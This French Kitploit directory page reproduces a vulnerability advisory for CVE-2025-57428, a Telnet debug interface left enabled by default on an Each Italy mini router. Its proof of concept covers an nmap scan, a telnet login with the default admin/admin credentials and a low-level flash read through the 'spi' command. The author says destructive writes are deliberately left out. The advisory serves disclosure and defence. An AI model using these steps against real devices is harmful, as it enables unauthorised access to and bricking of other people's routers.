Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-57428 — CVE-2025-57428 | Kitploit
Outils/GitHubGitHub/5ulfur/cve-2025-57428
Sécurité des Systèmes EmbarquésSécurité IoTAnalyse des VulnérabilitésExploitationTests d'IntrusionSécurité Matérielle
GitHub5ulfur/cve-2025-57428

CVE-2025-57428

CVE-2025-57428

Voir le dépôt
1il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

⚠️ Ce dépôt est maintenu uniquement comme référence pour CVE-2025-57428.
Pour les autres avis et mises à jour, veuillez vous référer à : security-advisories.

CVE-2025-57428 - Interface de débogage Telnet activée par défaut permet un accès bas niveau à la flash/aux registres

Produit concerné

  • Fournisseur/Marque : Each Italy
  • Appareil : Wireless Mini Router WIRELESS-N 300M
  • Firmware : v28K.MiniRouter.20190211

Résumé

Cet appareil expose une interface de débogage Telnet (activée par défaut sur le port 23) et accepte les identifiants admin (`admin`/`admin` par défaut). Après authentification, le shell fournit un accès direct à des commandes de bas niveau (notamment `spi` et `reg`), ce qui peut entraîner une corruption arbitraire du firmware, un brickage de l'appareil et une perte de fonctionnalité ou de configuration de sécurité.


Preuve de concept

Note : J'omets intentionnellement les commandes qui effectuent des écritures destructrices. La preuve de concept ci-dessous confirme l'existence et l'accessibilité de l'interface sans fournir un exploit prêt à l'emploi.

  1. Scannez l'appareil sur le réseau local :

    root@kitploit:~
    nmap -p 23 <device-ip>
    

    Résultat : le port 23 (telnet) s'affiche comme open.

  2. Connectez-vous via Telnet et authentifiez-vous (identifiants par défaut) :

    root@kitploit:~
    telnet <device-ip>
    # Login as: admin
    # Password: admin
    

    Après connexion, une invite de débogage est présentée CMD>.

  3. Listez les commandes disponibles :

    root@kitploit:~
    CMD>help
    

    La sortie de l'aide affiche les menus suivants :

    root@kitploit:~
    cfg         net         os
    

    Entrez dans le menu os :

    root@kitploit:~
    CMD>os
    

    Listez à nouveau les commandes disponibles :

    root@kitploit:~
    OS>help
    

    Cette fois, la sortie de l'aide affiche les commandes suivantes :

    root@kitploit:~
    thread      mem         spi         reg         cpuload     cpubusy     event
    

Observations :

  • Changer le mot de passe admin via l'interface web modifie également les identifiants Telnet, ce qui indique des identifiants partagés.
  • Telnet reste activé par défaut après la configuration initiale.

Communication avec le fournisseur

Les tentatives pour trouver un contact de sécurité ou un canal de support du fournisseur d'origine ont échoué. Le produit semble être un appareil rebadgé d'origine inconnue.

Avertissement

Cette information est fournie à des fins éducatives et défensives uniquement. L'auteur décline toute responsabilité en cas d'utilisation abusive de cette information.

Télécharger l’outil

L'utilisation de spi affiche spi <rd/wr/er> <addr> [len].

  • Lisez la mémoire flash :

    root@kitploit:~
    OS>spi rd 0x000fd0f0 16
    

    Cela renvoie un dump hexadécimal de la région flash :

    root@kitploit:~
    4f30650a 938f56fa 1b663a19 e316d824
    

    Cela confirme que la commande fonctionne et que le shell a un accès bas niveau. La commande d'écriture (spi wr) et la commande d'effacement (spi er), ainsi que les commandes reg, sont également exécutables.